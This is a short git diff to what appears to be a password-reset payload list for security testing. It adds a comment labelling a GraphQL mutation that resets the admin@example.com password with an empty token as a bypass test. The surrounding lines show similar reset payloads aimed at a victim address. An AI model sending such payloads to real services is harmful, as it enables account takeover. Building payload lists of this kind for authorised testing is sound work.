diff --git a/Password-Reset/password-reset-payloads.txt b/Password-Reset/password-reset-payloads.txt
index ff40d79..250d2b3 100644
--- a/Password-Reset/password-reset-payloads.txt
+++ b/Password-Reset/password-reset-payloads.txt
@@ -331,6 +331,7 @@ current_step=final
 
 # GraphQL mutations
 {"query":"mutation{resetPassword(email:\"victim@example.com\"){success}}"}
+# GraphQL mutation with empty token (testing bypass)
 {"query":"mutation{resetPassword(email:\"admin@example.com\",token:\"\"){success}}"}
 
 # REST API variations